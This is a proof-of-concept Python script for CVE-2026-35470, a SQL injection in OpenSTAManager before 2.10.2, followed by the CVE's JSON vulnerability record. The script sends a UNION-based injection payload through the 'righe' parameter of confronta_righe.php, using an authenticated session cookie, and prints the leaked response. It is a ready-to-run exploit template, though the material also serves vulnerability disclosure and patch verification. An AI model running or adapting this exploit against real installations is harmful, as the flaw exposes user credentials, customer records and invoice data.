CVE-2026-35470

# Proof of Concept for CVE-2026-35470 # Demonstrates SQL Injection in OpenSTAManager < 2.10.2 import requests target_url = "http://target-ip/openstamanager/confronta_righe.php" # Authentication is required (PR:L) cookies = { "PHPSESSID": "valid_session_id_here" } # Vulnerable parameter: righe # Payload attempts to extract database version via UNION based SQL Injection payload = "1 UNION SELECT 1,2,version(),4,5-- -" params = { "righe": payload } try: response = requests.get(target_url, params=params, cookies=cookies, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check response content for SQL errors or leaked data.") print(response.text[:500]) except Exception as e: print(f"[-] Error: {e}")

{"cve": {"id": "CVE-2026-35470", "sourceIdentifier": "[email protected]", "published": "2026-04-06T18:16:44.400", "lastModified": "2026-04-14T19:58:01.767", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to 2.10.2, confronta_righe.php files across different modules in OpenSTAManager contain an SQL Injection vulnerability. The righe parameter received via $_GET['righe'] is directly concatenated into an SQL query without any sanitization, parameterization or validation. An authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including user credentials, customer information, invoice data and any other stored data. This vulnerability is fixed in 2.10.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:devcode:openstamanager:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.10.2", "matchCriteriaId": "37690084-64E6-4E8B-8A92-8B55C8FC1E9F"}]}]}], "references": [{"url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-mmm5-3g4x-qw39", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-mmm5-3g4x-qw39", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}